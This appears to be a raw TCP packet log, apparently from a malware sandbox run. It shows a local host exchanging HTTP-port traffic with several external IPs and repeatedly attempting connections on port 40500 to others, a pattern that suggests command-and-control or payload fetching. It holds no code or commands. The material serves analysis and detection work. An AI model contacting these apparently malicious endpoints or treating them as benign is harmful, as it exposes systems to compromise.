Apr 24, 2024 10:06:58.826893091 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.826898098 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.826931000 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.826939106 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.826970100 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.826976061 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827008009 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827012062 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827047110 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827255964 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827300072 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827311993 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827349901 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827353954 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827394009 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827405930 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827433109 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827438116 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827470064 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827476025 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827512026 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827541113 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827578068 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827595949 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827611923 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827615023 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827652931 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:06:58.827657938 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:06:58.827693939 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:02.924985886 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:03.263219118 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:03.365341902 CEST	80	49710	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:03.365443945 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:05.458800077 CEST	49710	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:08.617115021 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:08.952084064 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:08.952265024 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:08.998130083 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.333933115 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334203959 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334244967 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334285021 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334289074 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334316015 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334323883 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334342003 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334362030 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334371090 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334403038 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334410906 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334443092 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334453106 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334490061 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334497929 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334542036 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334546089 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334579945 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.334633112 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.334640980 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.516765118 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.516783953 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669584036 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669634104 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669648886 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669672966 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669687033 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669711113 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669719934 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669759035 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669764996 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669821978 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669848919 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669887066 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669898987 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669925928 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669934034 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.669962883 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.669967890 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670001030 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670013905 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670037985 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670047045 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670079947 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670092106 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670130014 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670137882 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670167923 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670176983 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670206070 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670234919 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670244932 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670257092 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670283079 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670314074 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670320034 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670331001 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670356989 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670363903 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670396090 CEST	80	49713	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:09.670417070 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:09.670444965 CEST	49713	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:11.563483000 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:11.864929914 CEST	49716	40500	192.168.2.6	134.35.81.188
Apr 24, 2024 10:07:11.901458979 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:11.901621103 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:11.901932001 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.238249063 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240331888 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240355968 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240401983 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240417957 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.240461111 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240464926 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.240464926 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.240525007 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240544081 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240575075 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.240595102 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240617990 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.240659952 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.240709066 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.241719007 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.241787910 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.241789103 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.241838932 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577148914 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577210903 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577258110 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577282906 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577282906 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577300072 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577338934 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577356100 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577356100 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577383995 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577408075 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577425957 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577455997 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577464104 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577502012 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577502966 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577541113 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577549934 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577549934 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577579021 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577620029 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577636003 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577657938 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577678919 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577696085 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577698946 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577748060 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577758074 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577797890 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.577812910 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.577864885 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.578226089 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.578265905 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.578285933 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.578319073 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.578340054 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.578378916 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.578394890 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.578430891 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.861479044 CEST	49716	40500	192.168.2.6	134.35.81.188
Apr 24, 2024 10:07:12.914660931 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.914752960 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.914760113 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.914817095 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.914848089 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.914885998 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.914901018 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.914937973 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.914941072 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.914980888 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.914997101 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915019989 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915047884 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915056944 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915069103 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915096045 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915147066 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915168047 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915208101 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915224075 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915245056 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915283918 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915297985 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915323019 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915344954 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915360928 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915414095 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.915420055 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.915479898 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916327953 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916366100 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916384935 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916410923 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916420937 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916450024 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916464090 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916490078 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916506052 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916527987 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916543007 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916582108 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916599989 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916639090 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916656017 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916677952 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916692019 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916718006 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916733027 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916757107 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916769981 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916795015 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916815042 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916832924 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916851997 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916870117 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916907072 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916934013 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.916944981 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916981936 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.916990042 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.917021036 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.917030096 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.917057991 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.917073965 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.917095900 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.917135000 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.917150021 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.917170048 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:12.917201996 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:12.917296886 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:14.861449957 CEST	49716	40500	192.168.2.6	134.35.81.188
Apr 24, 2024 10:07:18.861498117 CEST	49716	40500	192.168.2.6	134.35.81.188
Apr 24, 2024 10:07:19.066494942 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:19.402990103 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:19.403055906 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:19.403207064 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:21.425288916 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:21.761950016 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:21.762011051 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:21.762166023 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:23.785530090 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:24.121994019 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:24.122106075 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:24.122208118 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:26.144078016 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:26.483851910 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:26.484044075 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:26.861434937 CEST	49716	40500	192.168.2.6	134.35.81.188
Apr 24, 2024 10:07:28.788214922 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:29.124979019 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:29.125123978 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:32.162642002 CEST	49723	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:32.508780956 CEST	80	49723	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:33.017771959 CEST	49723	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:33.363862038 CEST	80	49723	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:33.877089977 CEST	49723	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:34.253700018 CEST	80	49723	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:34.767756939 CEST	49723	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:35.113948107 CEST	80	49723	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:35.627123117 CEST	49723	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:35.973366022 CEST	80	49723	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:37.862560987 CEST	49724	40500	192.168.2.6	109.72.204.86
Apr 24, 2024 10:07:38.003740072 CEST	49725	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:38.349050045 CEST	80	49725	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:38.861598015 CEST	49725	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:38.877095938 CEST	49724	40500	192.168.2.6	109.72.204.86
Apr 24, 2024 10:07:39.207465887 CEST	80	49725	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:39.720820904 CEST	49725	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:40.063611031 CEST	80	49725	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:40.564591885 CEST	49725	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:40.877088070 CEST	49724	40500	192.168.2.6	109.72.204.86
Apr 24, 2024 10:07:40.907285929 CEST	80	49725	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:41.411431074 CEST	49725	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:41.755108118 CEST	80	49725	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:43.788923025 CEST	49727	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:44.133971930 CEST	80	49727	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:44.642710924 CEST	49727	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:44.877124071 CEST	49724	40500	192.168.2.6	109.72.204.86
Apr 24, 2024 10:07:44.990495920 CEST	80	49727	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:45.502082109 CEST	49727	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:45.850939035 CEST	80	49727	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:46.361453056 CEST	49727	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:46.706427097 CEST	80	49727	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:47.220952034 CEST	49727	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:47.565632105 CEST	80	49727	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:49.597753048 CEST	49728	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:49.944511890 CEST	80	49728	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:50.455239058 CEST	49728	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:50.802321911 CEST	80	49728	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:51.314696074 CEST	49728	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:51.664055109 CEST	80	49728	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:52.174046993 CEST	49728	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:52.521591902 CEST	80	49728	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:52.877089977 CEST	49724	40500	192.168.2.6	109.72.204.86
Apr 24, 2024 10:07:53.033370972 CEST	49728	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:53.379940987 CEST	80	49728	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:55.410269976 CEST	49730	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:55.761173964 CEST	80	49730	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:56.267724991 CEST	49730	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:56.614195108 CEST	80	49730	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:57.127151966 CEST	49730	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:57.473757982 CEST	80	49730	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:57.986624956 CEST	49730	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:58.335289001 CEST	80	49730	91.202.233.141	192.168.2.6
Apr 24, 2024 10:07:58.845870018 CEST	49730	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:07:59.125327110 CEST	80	49714	185.215.113.66	192.168.2.6
Apr 24, 2024 10:07:59.125483036 CEST	49714	80	192.168.2.6	185.215.113.66
Apr 24, 2024 10:07:59.192692041 CEST	80	49730	91.202.233.141	192.168.2.6
Apr 24, 2024 10:08:01.222822905 CEST	49731	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:08:01.570640087 CEST	80	49731	91.202.233.141	192.168.2.6
Apr 24, 2024 10:08:02.080497980 CEST	49731	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:08:02.430499077 CEST	80	49731	91.202.233.141	192.168.2.6
Apr 24, 2024 10:08:02.939605951 CEST	49731	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:08:03.289408922 CEST	80	49731	91.202.233.141	192.168.2.6
Apr 24, 2024 10:08:03.799046993 CEST	49731	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:08:03.909467936 CEST	49732	40500	192.168.2.6	213.230.90.222
Apr 24, 2024 10:08:04.149758101 CEST	80	49731	91.202.233.141	192.168.2.6
Apr 24, 2024 10:08:04.658341885 CEST	49731	80	192.168.2.6	91.202.233.141
Apr 24, 2024 10:08:04.924007893 CEST	49732	40500	192.168.2.6	213.230.90.222
Apr 24, 2024 10:08:05.005038977 CEST	80	49731	91.202.233.141	192.168.2.6
Apr 24, 2024 10:08:06.939764023 CEST	49732	40500	192.168.2.6	213.230.90.222
Apr 24, 2024 10:08:08.051963091 CEST	49734	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:08.393055916 CEST	80	49734	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:08.908380985 CEST	49734	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:09.251862049 CEST	80	49734	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:09.752197027 CEST	49734	80	192.168.2.6	193.233.132.177
Apr 24, 2024 10:08:10.093657017 CEST	80	49734	193.233.132.177	192.168.2.6
Apr 24, 2024 10:08:10.595877886 CEST	49734	80	192.168.2.6	193.233.132.177
